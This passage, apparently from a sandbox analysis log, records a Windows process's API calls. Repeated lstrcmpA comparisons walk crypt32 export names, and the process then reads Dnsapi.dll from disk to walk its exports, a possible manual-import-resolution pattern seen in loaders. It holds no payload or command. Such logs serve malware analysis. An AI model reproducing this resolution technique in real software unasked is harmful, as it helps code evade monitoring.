lpString2="CertAddCRLLinkToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0226.420] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.421] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.422] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0226.422] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0226.422] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.423] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.423] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.424] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.424] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.424] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.424] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.424] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0226.424] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0226.424] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0226.425] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0226.425] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0226.425] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0226.426] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0226.426] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0226.427] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0226.427] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0226.428] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0226.445] GetProcessHeap () returned 0x570000 [0226.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x410f040 | out: hHeap=0x570000) returned 1 [0226.700] GetProcessHeap () returned 0x570000 [0226.700] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589120 [0226.701] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0226.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0226.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0226.716] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0226.716] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0226.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0226.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0226.716] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0226.716] GetProcessHeap () returned 0x570000 [0226.716] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa7b88) returned 0x3a7d010 [0226.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0226.718] ReadFile (in: hFile=0x17c, lpBuffer=0x3a7d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a7d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0227.071] CloseHandle (hObject=0x17c) returned 1 [0227.071] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0227.071] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.071] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0227.072] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.072] lstrcmpA (lpString1="AddRefQueryBlobEx", 